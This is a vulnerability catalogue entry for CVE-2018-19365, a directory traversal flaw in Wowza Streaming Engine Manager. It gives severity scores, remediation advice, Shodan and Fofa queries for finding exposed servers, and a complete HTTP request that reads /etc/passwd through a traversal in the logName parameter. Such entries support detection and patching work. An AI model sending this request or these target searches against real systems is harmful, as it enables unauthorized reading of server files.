| Title | Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal |
|---|---|
| Author | 0x_Akoko |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. |
| Remediation | Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. |
| CVSS Score | 9.1 |
| EPSS Score | 0.8708 |
| CVE ID | CVE-2018-19365 |
| CWE ID | CWE-22 |
| Shodan Query | http.title:"manager" product:"wowza streaming engine"cpe:"cpe:2.3:a:wowza:streaming_engine" |
| Fofa Query | title="manager" product:"wowza streaming engine" |
| Tags | cve2018 cve wowza lfi vkev vuln |
Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/15.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19365.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-19365.pcap
N/AN/A